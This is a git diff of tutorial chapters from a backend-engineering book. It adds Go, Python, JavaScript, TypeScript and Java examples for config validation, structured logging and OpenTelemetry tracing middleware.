 **The whole topic in one breath:** gRPC lets a client call a server's method as if it were local. You define the API once in a `.proto` (sec 04), `protoc` generates a typed stub and server skeleton (sec 11), arguments are serialized as compact protobuf (sec 05) and carried over multiplexed HTTP/2 streams (sec 06) in one of four shapes, unary, server-, client-, or bidirectional-streaming (sec 07-10). A long-lived channel hosts cheap per-call stubs (sec 12); metadata carries auth and trace context, deadlines bound and propagate the call, cancellation reclaims work (sec 13); every call ends with a gRPC status code (sec 14); interceptors centralize cross-cutting logic (sec 15); TLS/mTLS plus per-call tokens secure it (sec 16); declarative retries and L7/client-side balancing make it resilient (sec 17). Reach for gRPC inside your system and REST at the public edge (sec 18-19), and lean on grpcurl, reflection and interceptors to see inside (sec 20).
 
-Grounded in grpc.io & protobuf.dev docs / MDN for HTTP/2 background / Go 1.22+ (google.golang.org/grpc) / Python 3.11+ (grpcio) examples.
+Grounded in grpc.io & protobuf.dev docs / MDN for HTTP/2 background / Go 1.22+ (google.golang.org/grpc), Python 3.11+ (grpcio), Node.js 20+ (@grpc/grpc-js), TypeScript 5+ (ts-proto) and Java 17+ (io.grpc) examples.
 
-Backend from First Principles / Chapter 13 / gRPC. Code targets Go 1.22+ and Python 3.11+.
+Backend from First Principles / Chapter 13 / gRPC. Code targets Go 1.22+, Python 3.11+, Node.js 20+, TypeScript 5+ and Java 17+.

--- a/src/content/chapters/14-configuration-management.mdx
+++ b/src/content/chapters/14-configuration-management.mdx
@@ -346,8 +346,10 @@ Most of the time, teams don't validate their environment variables or whatever s
 <Callout type="ok" title="The One Thing to Take Away From This Whole Topic">
 If you take just one thing away: **always validate your configs**, no matter where they come from. Validate at startup, before your application starts, right after it's deployed. Use a proper validation library:\
 \
-\- **TypeScript backend** -> use `Zod`\
+\- **JavaScript / TypeScript backend** -> use `Zod`\
 \- **Go backend** -> use `go-playground/validator`\
+\- **Python backend** -> use `pydantic-settings`\
+\- **Java backend** -> use Jakarta Validation with `@ConfigurationProperties`\
 \
 Use whatever validation library your language/framework offers, and properly validate every variable, which ones are mandatory, which are optional, which have application-code defaults.
 </Callout>
@@ -356,9 +358,13 @@ Why does this matter so much? It's learned the hard way. If you have a mandatory
 
 ## Code Examples
 
-Below are practical implementations of config loading and validation in Go and Python, covering env vars, per-environment loading, hybrid sources, and startup validation.
+Below is the same config loader written five times over, covering env vars, per-environment loading, hybrid sources, and startup validation. Every one of them does the identical three things in the identical order: read the environment, apply defaults, then **validate before the app is allowed to boot**. Only the validation library changes.
 
-### 9.1: Config Loading & Validation in Go
+### 9.1: Config Loading & Validation
+
+Go Python JavaScript TypeScript Java
+
+read the environment, apply defaults, validate, then boot
 
 ```go title="config.go / Go + go-playground/validator + godotenv"
 package config
@@ -455,8 +461,6 @@ func getEnvInt(key string, fallback int) int {
 //   if err != nil { log.Fatal(err) }  // crash early, crash loud
 ```
 
-### 9.2: Config Loading & Validation in Python
-
 ```python title="config.py / Python + pydantic-settings (the Python equivalent of Zod)"
 from enum import Enum
 from functools import lru_cache
@@ -520,7 +524,183 @@ def get_settings() -> Settings:
 #   if settings.new_checkout_enabled: ...
 ```
 
-### 9.3: Example YAML Config File
+```js title="config.js / Node 20+ + zod + dotenv"
+import 'dotenv/config' // load .env in local dev; a no-op in production
+import { z } from 'zod'
+
+// The schema IS the documentation of what this service needs to run.
+// Everything in process.env is a string, so each field says how to turn
+// that string into the type the app actually wants.
+const ConfigSchema = z.object({
+  // Application settings (with sensible defaults)
+  PORT: z.coerce.number().int().min(1).max(65535).default(8080),
+  LOG_LEVEL: z.enum(['debug', 'info', 'warn', 'error']).default('info'),
+  APP_ENV: z.enum(['development', 'staging', 'production']).default('development'),
+
+  // Database config, mandatory, no defaults (will fail if missing)
+  DB_HOST: z.string().min(1),
+  DB_PORT: z.coerce.number().int().default(5432),
+  DB_USER: z.string().min(1),
+  DB_PASSWORD: z.string().min(1), // sensitive, never hardcoded
+  DB_NAME: z.string().min(1),
+  DB_POOL_SIZE: z.coerce.number().int().min(1).default(10), // dev=10, prod=50
+
+  // External services, mandatory secret
+  STRIPE_API_KEY: z.string().min(1),
+
+  // Feature flag, optional, defaults off.
+  // Note the explicit string compare: Boolean('false') is TRUE, which is
+  // the single most common way a feature flag ships on by accident.
+  NEW_CHECKOUT: z
+    .enum(['true', 'false'])
+    .default('false')
+    .transform((v) => v === 'true'),
+})
+
+// THE critical step: parse once, at import time, before anything boots.
+const parsed = ConfigSchema.safeParse(process.env)
+if (!parsed.success) {
+  // Crash early, crash loud, and say exactly WHICH vars are wrong.
+  console.error('config validation failed:', z.treeifyError(parsed.error))
+  process.exit(1)
+}
+
+export const config = {
+  ...parsed.data,
+  // Constructed from the parts, never stored as its own secret
+  databaseUrl:
+    `postgresql://${parsed.data.DB_USER}:${parsed.data.DB_PASSWORD}` +
+    `@${parsed.data.DB_HOST}:${parsed.data.DB_PORT}/${parsed.data.DB_NAME}`,
+}
+
+// Usage:
+//   import { config } from './config.js'
+//   app.listen(config.PORT)
+```
+
+```ts title="config.ts / TypeScript 5+ + zod + dotenv"
+import 'dotenv/config'
+import { z } from 'zod'
+
+const ConfigSchema = z.object({
+  port: z.coerce.number().int().min(1).max(65535).default(8080),
+  logLevel: z.enum(['debug', 'info', 'warn', 'error']).default('info'),
+  appEnv: z.enum(['development', 'staging', 'production']).default('development'),
+
+  dbHost: z.string().min(1),
+  dbPort: z.coerce.number().int().default(5432),
+  dbUser: z.string().min(1),
+  dbPassword: z.string().min(1),
+  dbName: z.string().min(1),
+  dbPoolSize: z.coerce.number().int().min(1).default(10),
+
+  stripeApiKey: z.string().min(1),
+  newCheckoutEnabled: z
+    .enum(['true', 'false'])
+    .default('false')
+    .transform((v) => v === 'true'),
+})
+
+// This one line is why TypeScript is worth it here: the Config TYPE is
+// derived FROM the schema, so the thing the compiler checks and the thing
+// that runs at startup can never drift apart. Add a field to the schema
+// and every place that builds a Config stops compiling until it is set.
+export type Config = z.infer<typeof ConfigSchema>
+
+function load(): Config & { databaseUrl: string } {
+  const parsed = ConfigSchema.safeParse({
+    port: process.env.PORT,
+    logLevel: process.env.LOG_LEVEL,
+    appEnv: process.env.APP_ENV,
+    dbHost: process.env.DB_HOST,
+    dbPort: process.env.DB_PORT,
+    dbUser: process.env.DB_USER,
+    dbPassword: process.env.DB_PASSWORD,
+    dbName: process.env.DB_NAME,
+    dbPoolSize: process.env.DB_POOL_SIZE,
+    stripeApiKey: process.env.STRIPE_API_KEY,
+    newCheckoutEnabled: process.env.NEW_CHECKOUT,
+  })
+
+  if (!parsed.success) {
+    // Crash early, crash loud, naming every field that failed
+    console.error('config validation failed:', z.treeifyError(parsed.error))
+    process.exit(1)
+  }
+
+  const c = parsed.data
+  return {
+    ...c,
+    databaseUrl: `postgresql://${c.dbUser}:${c.dbPassword}@${c.dbHost}:${c.dbPort}/${c.dbName}`,
+  }
+}
+
+export const config = load() // validated once, at import, reused everywhere
+```
+
+```java title="AppConfig.java / Java 17+ + Spring Boot + Jakarta Validation"
+// Spring binds environment variables onto this record by NAME:
+// DB_POOL_SIZE -> db.pool-size -> dbPoolSize. The jakarta.validation
+// annotations are the validate tags, and @Validated is what makes the
+// application context refuse to start when one of them fails.
+@Validated
+@ConfigurationProperties(prefix = "app")
+public record AppConfig(
+
+    // Application settings
+    @Min(1) @Max(65535) int port,
+    @Pattern(regexp = "debug|info|warn|error") String logLevel,
+    @NotNull Environment appEnv,
+
+    // Database config (sensitive)
+    @NotBlank String dbHost,
+    int dbPort,
+    @NotBlank String dbUser,
+    @NotBlank String dbPassword,
+    @NotBlank String dbName,
+    @Min(1) int dbPoolSize,
+
+    // External services (sensitive)
+    @NotBlank String stripeApiKey,
+
+    // Feature flag, optional, defaults off
+    boolean newCheckoutEnabled
+) {
+    public enum Environment { DEVELOPMENT, STAGING, PRODUCTION }
+
+    /** Constructs the connection URL from the parts. */
+    public String databaseUrl() {
+        return "postgresql://%s:%s@%s:%d/%s"
+            .formatted(dbUser, dbPassword, dbHost, dbPort, dbName);
+    }
+}
+
+// application.yml carries the DEFAULTS and the env-var mapping. The
+// ${VAR:default} syntax is the whole defaulting story in one place, and
+// a ${VAR} with no default fails startup if the variable is missing.
+//
+//   app:
+//     port:          ${PORT:8080}
+//     log-level:     ${LOG_LEVEL:info}
+//     app-env:       ${APP_ENV:DEVELOPMENT}
+//     db-host:       ${DB_HOST}
+//     db-port:       ${DB_PORT:5432}
+//     db-pool-size:  ${DB_POOL_SIZE:10}
+//     stripe-api-key: ${STRIPE_API_KEY}
+//     new-checkout-enabled: ${NEW_CHECKOUT:false}
+
+@SpringBootApplication
+@EnableConfigurationProperties(AppConfig.class)
+public class Application {
+    public static void main(String[] args) {
+        // A validation failure throws before the port is ever bound:
+        // crash early, crash loud, with the failing field named.
+        SpringApplication.run(Application.class, args);
+    }
+}
+```
+
+### 9.2: Example YAML Config File
 
 For non-secret, structured settings, a YAML file (with comments, unlike JSON) is a common choice, as seen in real codebases like Authelia and Apache Answer:
 
@@ -586,6 +766,6 @@ business:
 </Callout>
 
 BACKEND ENGINEERING FIELD MANUAL / V2 / CHAPTER 13 / CONFIGURATION MANAGEMENT\
-Notes compiled from lecture transcript / Go + Python examples / Vault/MDN references inline
+Notes compiled from lecture transcript / Go, Python, JavaScript, TypeScript & Java examples / Vault/MDN references inline
 
-Backend from First Principles / Chapter 14 / Config. Code targets Go 1.22+ and Python 3.11+.
+Backend from First Principles / Chapter 14 / Config. Code targets Go 1.22+, Python 3.11+, Node.js 20+, TypeScript 5+ and Java 17+ (Spring Boot).

--- a/src/content/chapters/15-logging-and-observability.mdx
+++ b/src/content/chapters/15-logging-and-observability.mdx
@@ -2,7 +2,7 @@
 order: 15
 title: "Logging & Observability"
 navTitle: "Logging & Observability"
-summary: "Chapter 15 of Backend from First Principles: Logging & Observability."
+summary: "You cannot fix what you cannot see. The three pillars, logs, metrics and traces, what each one answers that the other two cannot, and how to wire all three into a service so a 3am page leads to the actual broken line. Worked implementations in Go, Python, JavaScript, TypeScript and Java."
 readingTime: "2-3 hours"
 keywords:
   - "logging"
@@ -220,9 +220,13 @@ FATAL
 Levels form a hierarchy: **DEBUG &lt; INFO &lt; WARN &lt; ERROR &lt; FATAL**. Setting your logger to `INFO` means it emits INFO, WARN, ERROR, and FATAL, but suppresses DEBUG. Setting to `ERROR` means only ERROR and FATAL are emitted. This is how you control log volume per environment.
 </Callout>
 
-### Environment-Specific Level Configuration (Go)
+### Environment-Specific Level Configuration
 
-```go
+Go Python JavaScript TypeScript Java
+
+JSON in production, a readable console locally, and a level per environment
+
+```go title="logger/logger.go / Go + Zap"
 // logger/logger.go, Environment-aware log level
 package logger
 
@@ -264,7 +268,140 @@ func New() *zap.Logger {
     logger, _ := cfg.Build()
     return logger
 }
-Go / Zap
+```
+
+```python title="logging_config.py / Python + structlog"
+# logging_config.py, Environment-aware log level
+import logging
+import os
+
+import structlog
+
+
+def get_log_level() -> int:
+    env = os.getenv("APP_ENV", "development")
+    if env == "production":
+        return logging.INFO      # production: INFO and above
+    if env == "staging":
+        return logging.WARNING   # staging: WARN and above only
+    return logging.DEBUG         # local dev: everything
+
+
+def configure() -> None:
+    env = os.getenv("APP_ENV", "development")
+
+    if env == "production":
+        # Production: JSON format, parseable by Loki, ELK, New Relic
+        renderer = structlog.processors.JSONRenderer()
+    else:
+        # Development: coloured console format, human-readable
+        renderer = structlog.dev.ConsoleRenderer(colors=True)
+
+    structlog.configure(
+        processors=[
+            structlog.processors.TimeStamper(fmt="iso"),
+            structlog.stdlib.add_log_level,
+            renderer,
+        ],
+        # A FILTERING bound logger drops suppressed levels before the
+        # message is ever formatted, so a debug log in a hot path costs
+        # almost nothing in production rather than being built and binned.
+        wrapper_class=structlog.make_filtering_bound_logger(get_log_level()),
+    )
+    logging.basicConfig(level=get_log_level())
+```
+
+```js title="logger.js / Node 20+ + pino"
+// logger.js, Environment-aware log level
+import pino from 'pino'
+
+const env = process.env.APP_ENV ?? 'development'
+
+function getLogLevel() {
+  switch (env) {
+    case 'production': return 'info'  // production: INFO and above
+    case 'staging':    return 'warn'  // staging: WARN and above only
+    default:           return 'debug' // local dev: everything
+  }
+}
+
+export const log = pino({
+  level: getLogLevel(),
+  timestamp: pino.stdTimeFunctions.isoTime,
+
+  // Production: raw JSON straight to stdout, which is exactly what Loki,
+  // ELK and New Relic want. Development: coloured, human-readable.
+  // pino-pretty is a DEV dependency on purpose, it costs real throughput.
+  transport:
+    env === 'production'
+      ? undefined
+      : { target: 'pino-pretty', options: { colorize: true } },
+})
+```
+
+```ts title="logger.ts / TypeScript 5+ + pino"
+import pino, { type Level, type Logger } from 'pino'
+
+type Env = 'development' | 'staging' | 'production'
+
+const env = (process.env.APP_ENV ?? 'development') as Env
+
+// A Record keyed by Env means adding a fourth environment will not
+// compile until this table decides what level it logs at. A switch with
+// a default would have silently given it the dev level instead.
+const LEVELS: Record<Env, Level> = {
+  production: 'info',   // production: INFO and above
+  staging: 'warn',      // staging: WARN and above only
+  development: 'debug', // local dev: everything
+}
+
+export const log: Logger = pino({
+  level: LEVELS[env],
+  timestamp: pino.stdTimeFunctions.isoTime,
+  transport:
+    env === 'production'
+      ? undefined
+      : { target: 'pino-pretty', options: { colorize: true } },
+})
+```
+
+```java title="logback-spring.xml / Java 17+ + Logback"
+<!-- Java keeps this in configuration rather than code, and Spring's
+     profile blocks are how the environment picks a shape. -->
+<configuration>
+
+  <!-- Production: one JSON object per line, parseable by Loki / ELK / NR -->
+  <springProfile name="production">
+    <appender name="JSON" class="ch.qos.logback.core.ConsoleAppender">
+      <encoder class="net.logstash.logback.encoder.LogstashEncoder">
+        <timeZone>UTC</timeZone>
+      </encoder>
+    </appender>
+    <root level="INFO"><appender-ref ref="JSON"/></root>
+  </springProfile>
+
+  <springProfile name="staging">
+    <appender name="JSON" class="ch.qos.logback.core.ConsoleAppender">
+      <encoder class="net.logstash.logback.encoder.LogstashEncoder"/>
+    </appender>
+    <root level="WARN"><appender-ref ref="JSON"/></root>
+  </springProfile>
+
+  <!-- Local dev: coloured console, human-readable -->
+  <springProfile name="default">
+    <appender name="CONSOLE" class="ch.qos.logback.core.ConsoleAppender">
+      <encoder>
+        <pattern>%highlight(%-5level) %cyan(%logger{20}) - %msg%n</pattern>
+      </encoder>
+    </appender>
+    <root level="DEBUG"><appender-ref ref="CONSOLE"/></root>
+  </springProfile>
+
+</configuration>
+
+<!-- Because the level lives per LOGGER NAME (the class), you can also
+     raise one package to DEBUG in production without touching the rest:
+       <logger name="com.example.todo.repo" level="DEBUG"/> -->
 ```
 
 07
@@ -418,13 +555,17 @@ OTel provides libraries that auto-instrument popular frameworks (net/http, gin, 
 
 11
 
-## Code: Go: Full LMO Implementation
+## Code: Full LMO Implementation
 
-A complete example showing logging (Zap), metrics (Prometheus), and tracing (OpenTelemetry) wired into a Go service handler. This is the pattern from the lecture's to-do application.
+A complete example showing logging, metrics and tracing wired into one service handler, in five languages. This is the pattern from the lecture's to-do application. The libraries differ, Zap and structlog and pino and Logback, but the three pillars are assembled the same way everywhere: a logger that emits JSON with fixed fields, a middleware that opens a span per request, a service method that logs and traces the business event, and a middleware that counts and times every request.
 
-### Logger Setup (Zap)
+### Logger Setup
 
-```go
+Go Python JavaScript TypeScript Java
+
+structured output with a fixed set of fields on every line
+
+```go title="logger/logger.go / Go + Zap"
 // logger/logger.go
 package logger
 
@@ -457,12 +598,140 @@ func Init() {
         ),
     )
 }
-Go / Zap
+```
+
+```python title="logging_config.py / Python + structlog"
+# logging_config.py, structlog setup for Python
+import logging
+import os
+
+import structlog
+
+
+def configure_logging():
+    env = os.getenv("APP_ENV", "development")
+
+    if env == "production":
+        # JSON renderer for production, parseable by Loki / ELK
+        renderer = structlog.processors.JSONRenderer()
+        level = logging.INFO
+    else:
+        # Colourful console for local dev, human-readable
+        renderer = structlog.dev.ConsoleRenderer(colors=True)
+        level = logging.DEBUG
+
+    structlog.configure(
+        processors=[
+            structlog.contextvars.merge_contextvars,      # merge request-scoped context
+            structlog.processors.TimeStamper(fmt="iso"),
+            structlog.stdlib.add_log_level,
+            structlog.stdlib.add_logger_name,
+            structlog.processors.StackInfoRenderer(),
+            structlog.processors.ExceptionRenderer(),     # auto-renders exceptions
+            renderer,
+        ],
+        logger_factory=structlog.stdlib.LoggerFactory(),
+        wrapper_class=structlog.stdlib.BoundLogger,
+        cache_logger_on_first_use=True,
+    )
+
+    logging.basicConfig(level=level)
+
+
+# Always include these fields in every log entry
+log = structlog.get_logger().bind(
+    service="todo-api",
+    env=os.getenv("APP_ENV", "development"),
+)
+```
+
+```js title="logger.js / Node 20+ + pino"
+// logger.js
+import pino from 'pino'
+
+const env = process.env.APP_ENV ?? 'development'
+
+export const log = pino({
+  level: env === 'production' ? 'info' : 'debug',
+
+  // `base` is the fixed field set: these two land on EVERY log entry
+  base: { service: 'todo-api', env },
+
+  timestamp: pino.stdTimeFunctions.isoTime,
+
+  transport:
+    env === 'production'
+      ? undefined // JSON output
+      : { target: 'pino-pretty', options: { colorize: true } }, // coloured console
+
+  // Redaction belongs in the logger, not in the hundred call sites that
+  // might each forget. See sec 21: never log credentials, ever.
+  redact: ['req.headers.authorization', '*.password', '*.token'],
+})
+```
+
+```ts title="logger.ts / TypeScript 5+ + pino"
+import pino, { type Logger } from 'pino'
+
+const env = process.env.APP_ENV ?? 'development'
+
+export const log: Logger = pino({
+  level: env === 'production' ? 'info' : 'debug',
+  base: { service: 'todo-api', env }, // on every log entry
+  timestamp: pino.stdTimeFunctions.isoTime,
+  redact: ['req.headers.authorization', '*.password', '*.token'],
+  transport:
+    env === 'production'
+      ? undefined
+      : { target: 'pino-pretty', options: { colorize: true } },
+})
+
+// A CHILD logger binds fields once and stamps them on every line it
+// emits. This is the cheap way to guarantee the request id from chapter
+// 06 reaches every log entry in a request, with no call site passing it
+// by hand, and the returned type is still a plain Logger, so nothing
+// downstream has to know whether it was handed the root or a child.
+export function requestLogger(requestId: string, userId: string): Logger {
+  return log.child({ request_id: requestId, user_id: userId })
+}
+```
+
+```java title="TodoService.java / Java 17+ + SLF4J + Logback"
+// In Java the CONFIGURATION lives in logback-spring.xml (see sec 06) and
+// the code side is deliberately tiny: one logger per class, obtained by
+// class, so the class name becomes the logger name.
+@Service
+public class TodoService {
+
+    // Always static final: it is created once per class, not per instance.
+    private static final Logger log = LoggerFactory.getLogger(TodoService.class);
+
+    // The fixed fields ("service", "env") are set once in the encoder:
+    //   <customFields>{"service":"todo-api","env":"production"}</customFields>
+
+    void example(String userId, String requestId) {
+        // MDC is the per-request context from chapter 06. Anything put
+        // here is added to every JSON log line from this thread, which is
+        // how a request id reaches a log statement ten frames down that
+        // has never heard of the request.
+        MDC.put("user_id", userId);
+        MDC.put("request_id", requestId);
+        try {
+            log.info("creating todo"); // the JSON gains both fields for free
+        } finally {
+            MDC.clear(); // threads are pooled; never leak into the next request
+        }
+    }
+}
 ```
 
 ### Tracing Middleware (OpenTelemetry)
 
-```go
+Go Python JavaScript TypeScript Java
+
+extract the incoming trace, open a span, attach the business context
+
+```go title="middleware/tracing.go / Go + Gin + OTel"
 // middleware/tracing.go, Creates a trace span per request
 package middleware
 
@@ -517,12 +786,198 @@ func EnhancedTracing() gin.HandlerFunc {
         )
     }
 }
-Go / Gin + OTel
+```
+
+```python title="tracing.py / Python + FastAPI + OTel"
+# tracing.py, OTel setup for FastAPI
+from opentelemetry import trace
+from opentelemetry.sdk.trace import TracerProvider
+from opentelemetry.sdk.trace.export import BatchSpanProcessor
+from opentelemetry.exporter.otlp.proto.grpc.trace_exporter import OTLPSpanExporter
+from opentelemetry.instrumentation.fastapi import FastAPIInstrumentor
+from opentelemetry.instrumentation.sqlalchemy import SQLAlchemyInstrumentor
+
+
+def setup_tracing(app):
+    # Tracer provider, sends spans to OTel Collector via gRPC
+    provider = TracerProvider()
+    exporter = OTLPSpanExporter(endpoint="http://otel-collector:4317")
+    provider.add_span_processor(BatchSpanProcessor(exporter))
+    trace.set_tracer_provider(provider)
+
+    # Auto-instrument FastAPI, all routes get spans automatically, and
+    # the incoming traceparent header is extracted for you
+    FastAPIInstrumentor.instrument_app(app)
+
+    # Auto-instrument SQLAlchemy, all DB queries get spans automatically
+    SQLAlchemyInstrumentor().instrument(engine=engine)
+
+
+# main.py, wire it all up
+from fastapi import FastAPI
+from tracing import setup_tracing
+from logging_config import configure_logging, log
+
+configure_logging()
+app = FastAPI()
+setup_tracing(app)
+```
+
+```js title="tracing.js / Node 20+ + Express + OTel"
+// tracing.js, creates a trace span per request
+import { NodeSDK } from '@opentelemetry/sdk-node'
+import { OTLPTraceExporter } from '@opentelemetry/exporter-trace-otlp-grpc'
+import { getNodeAutoInstrumentations } from '@opentelemetry/auto-instrumentations-node'
+import { trace, context, propagation, SpanStatusCode } from '@opentelemetry/api'
+import { log } from './logger.js'
+
+// Auto-instrumentation patches http, express, pg and redis, so most spans
+// exist without you writing them. It MUST start before your app imports
+// those modules, so this file is loaded with --import, not required later.
+new NodeSDK({
+  traceExporter: new OTLPTraceExporter({ url: 'http://otel-collector:4317' }),
+  instrumentations: [getNodeAutoInstrumentations()],
+}).start()
+
+const tracer = trace.getTracer('todo-api')
+
+export function enhancedTracing(req, res, next) {
+  // Extract incoming trace context (from load balancer / front-end)
+  const parent = propagation.extract(context.active(), req.headers)
+
+  // Start root span for this request
+  const span = tracer.startSpan(req.route?.path ?? req.path, {}, parent)
+
+  // Attach metadata to span (visible in trace UI)
+  span.setAttributes({
+    'http.method': req.method,
+    'http.path': req.route?.path ?? req.path,
+    'http.user_agent': req.get('user-agent'),
+    'user.id': getUserId(req),
+  })
+
+  res.on('finish', () => {
+    // After the handler returns: record status code on span
+    span.setAttribute('http.status_code', res.statusCode)
+    if (res.statusCode >= 500) {
+      span.setStatus({ code: SpanStatusCode.ERROR, message: 'server error' })
+    }
+
+    // Structured log entry linking to this trace
+    log.info({
+      method: req.method,
+      path: req.route?.path ?? req.path,
+      status: res.statusCode,
+      trace_id: span.spanContext().traceId,
+    }, 'request completed')
+
+    span.end()
+  })
+
+  // Run the rest of the chain INSIDE this span's context, so anything
+  // downstream that opens a span becomes its child automatically.
+  context.with(trace.setSpan(parent, span), next)
+}
+```
+
+```ts title="tracing.ts / TypeScript 5+ + Express + OTel"
+import { trace, context, propagation, SpanStatusCode, type Span } from '@opentelemetry/api'
+import type { NextFunction, Request, Response } from 'express'
+
+const tracer = trace.getTracer('todo-api')
+
+export function enhancedTracing(req: Request, res: Response, next: NextFunction): void {
+  // Extract incoming trace context (from load balancer / front-end)
+  const parent = propagation.extract(context.active(), req.headers)
+
+  // Use the ROUTE TEMPLATE as the span name ("/todos/:id"), never the
+  // real path. A span name per todo id makes the trace UI useless,
+  // exactly as it would make a Prometheus label useless (sec 10).
+  const routeName = req.route?.path ?? req.path
+  const span: Span = tracer.startSpan(routeName, {}, parent)
+
+  span.setAttributes({
+    'http.method': req.method,
+    'http.path': routeName,
+    'http.user_agent': req.get('user-agent') ?? 'unknown',
+    'user.id': getUserId(req),
+  })
+
+  res.on('finish', () => {
+    span.setAttribute('http.status_code', res.statusCode)
+    if (res.statusCode >= 500) {
+      span.setStatus({ code: SpanStatusCode.ERROR, message: 'server error' })
+    }
+    log.info({
+      method: req.method,
+      path: routeName,
+      status: res.statusCode,
+      trace_id: span.spanContext().traceId,
+    }, 'request completed')
+    span.end() // in the 'finish' handler, so it runs on every path
+  })
+
+  context.with(trace.setSpan(parent, span), next)
+}
+```
+
+```java title="TracingFilter.java / Java 17+ + Spring Boot + OTel"
+// Spring needs very little tracing middleware of its own. Adding the
+// OpenTelemetry starter instruments every controller, RestClient and JDBC
+// call, and extracts the incoming traceparent header automatically:
+//
+//   implementation 'io.opentelemetry.instrumentation:opentelemetry-spring-boot-starter'
+//
+//   otel.service.name: todo-api
+//   otel.exporter.otlp.endpoint: http://otel-collector:4317
+
+// What is still worth writing by hand is the per-request enrichment.
+@Component
+public class TracingFilter extends OncePerRequestFilter {
+    private static final Logger log = LoggerFactory.getLogger(TracingFilter.class);
+
+    @Override
+    protected void doFilterInternal(HttpServletRequest req, HttpServletResponse res,
+                                    FilterChain chain)
+            throws ServletException, IOException {
+        // The starter already extracted the incoming trace context and
+        // started the root span; pick it up rather than starting another.
+        Span span = Span.current();
+
+        // Attach metadata to span (visible in trace UI)
+        span.setAttribute("http.method", req.getMethod());
+        span.setAttribute("http.path", req.getRequestURI());
+        span.setAttribute("http.user_agent", String.valueOf(req.getHeader("User-Agent")));
+        span.setAttribute("user.id", getUserId(req));
+
+        // Putting the trace id in MDC is what joins the three pillars:
+        // every log line this request emits now carries the id that the
+        // trace UI is keyed on, so a slow span leads straight to its logs.
+        MDC.put("trace_id", span.getSpanContext().getTraceId());
+
+        try {
+            chain.doFilter(req, res);
+        } finally {
+            int status = res.getStatus();
+            span.setAttribute("http.status_code", status);
+            if (status >= 500) {
+                span.setStatus(StatusCode.ERROR, "server error");
+            }
+            log.info("request completed method={} path={} status={}",
+                req.getMethod(), req.getRequestURI(), status);
+            MDC.clear();
+        }
+    }
+}
 ```
 
 ### Service Layer: Logging + Tracing + Error Handling
 
-```go
+Go Python JavaScript TypeScript Java
+
+one business operation, instrumented end to end
+
+```go title="services/todo_service.go / Go + Zap + OTel"
 // services/todo_service.go, The full LMO pattern per function
 package services
 
@@ -589,12 +1044,217 @@ func CreateTodo(ctx context.Context, req models.CreateTodoRequest, userID string
 
     return todo, nil
 }
-Go / Zap + OTel
+```
+
+```python title="services/todo_service.py / Python + structlog + OTel"
+# services/todo_service.py
+from opentelemetry import trace
+import structlog
+
+tracer = trace.get_tracer("todo-service")
+log = structlog.get_logger()
+
+
+async def create_todo(user_id: str, req: CreateTodoRequest) -> Todo:
+    # 1. Start child span (the parent is the request span from the middleware)
+    with tracer.start_as_current_span("TodoService.create_todo") as span:
+        # 2. Add business context to the span, visible in trace UI
+        span.set_attribute("user.id", user_id)
+        span.set_attribute("todo.title", req.title)
+
+        # 3. INFO log, business event start
+        log.info("creating_todo", user_id=user_id, title=req.title)
+
+        try:
+            # 4. Execute DB operation (its own child span, auto-instrumented)
+            todo = await repo.create_todo(user_id, req)
+
+            # 5. DEBUG log, only visible in dev, suppressed in production
+            log.debug("todo_created", todo_id=todo.id)
+
+            # 6. INFO, business event completion log (for audit trail)
+            log.info("todo_created_successfully",
+                todo_id=todo.id,
+                user_id=user_id,
+                title=todo.title,
+                priority=todo.priority,
+            )
+            return todo
+
+        except Exception as e:
+            # ERROR log with full context + span error recording
+            log.error("todo_creation_failed", user_id=user_id, error=str(e))
+            span.record_exception(e)
+            span.set_status(trace.StatusCode.ERROR, str(e))
+            raise
+```
+
+```js title="services/todoService.js / Node 20+ + pino + OTel"
+// services/todoService.js, the full LMO pattern per function
+import { trace, SpanStatusCode } from '@opentelemetry/api'
+import { log } from '../logger.js'
+
+const tracer = trace.getTracer('todo-service')
+
+export async function createTodo(req, userId) {
+  // 1. Start a child span. startActiveSpan also makes it the CURRENT
+  //    span, so the DB call below nests under it automatically.
+  return tracer.startActiveSpan('TodoService.createTodo', async (span) => {
+    // 2. Add business context to the span, visible in trace UI
+    span.setAttributes({
+      'user.id': userId,
+      'todo.title': req.title,
+      'todo.priority': req.priority,
+    })
+
+    const traceId = span.spanContext().traceId
+
+    // 3. INFO log, record business event start
+    log.info({ user_id: userId, title: req.title, trace_id: traceId }, 'creating todo')
+
+    try {
+      // 4. Execute DB operation (its own child span, auto-instrumented)
+      const todo = await repo.createTodo(req, userId)
+
+      // 5. DEBUG log, only visible in dev, suppressed in production
+      log.debug({ todo_id: todo.id }, 'todo created')
+
+      // 6. INFO, business event completion log (for audit trail)
+      log.info({
+        todo_id: todo.id,
+        user_id: userId,
+        title: todo.title,
+        priority: todo.priority,
+        category_id: todo.categoryId,
+      }, 'todo created successfully')
+
+      return todo
+    } catch (err) {
+      // ERROR log with full context
+      log.error({ user_id: userId, err, trace_id: traceId }, 'failed to create todo')
+      // Record error on span, shows as failed in Jaeger / Grafana Tempo
+      span.recordException(err)
+      span.setStatus({ code: SpanStatusCode.ERROR, message: err.message })
+      throw err
+    } finally {
+      // startActiveSpan does NOT end the span for you. A span that is
+      // never ended is a span that never reaches the collector.
+      span.end()
+    }
+  })
+}
+```
+
+```ts title="services/todoService.ts / TypeScript 5+ + pino + OTel"
+import { trace, SpanStatusCode, type Span } from '@opentelemetry/api'
+import { log } from '../logger'
+
+const tracer = trace.getTracer('todo-service')
+
+export async function createTodo(req: CreateTodoRequest, userId: string): Promise<Todo> {
+  // 1. Start a child span, and make it current for everything inside
+  return tracer.startActiveSpan('TodoService.createTodo', async (span: Span) => {
+    // 2. Add business context to the span, visible in trace UI.
+    // Attribute VALUES must be primitives; passing an object silently
+    // drops the attribute, so shape it here rather than at the call site.
+    span.setAttributes({
+      'user.id': userId,
+      'todo.title': req.title,
+      'todo.priority': req.priority,
+    })
+
+    const traceId = span.spanContext().traceId
+
+    // 3. INFO log, record business event start
+    log.info({ user_id: userId, title: req.title, trace_id: traceId }, 'creating todo')
+
+    try {
+      const todo = await repo.createTodo(req, userId) // 4. DB, own child span
+
+      log.debug({ todo_id: todo.id }, 'todo created') // 5. dev only
+
+      // 6. INFO, business event completion log (for audit trail)
+      log.info({
+        todo_id: todo.id,
+        user_id: userId,
+        title: todo.title,
+        priority: todo.priority,
+        category_id: todo.categoryId,
+      }, 'todo created successfully')
+
+      return todo
+    } catch (err) {
+      log.error({ user_id: userId, err, trace_id: traceId }, 'failed to create todo')
+      span.recordException(err as Error)
+      span.setStatus({ code: SpanStatusCode.ERROR, message: (err as Error).message })
+      throw err // re-throw: the caller decides the status code, not us
+    } finally {
+      span.end()
+    }
+  })
+}
+```
+
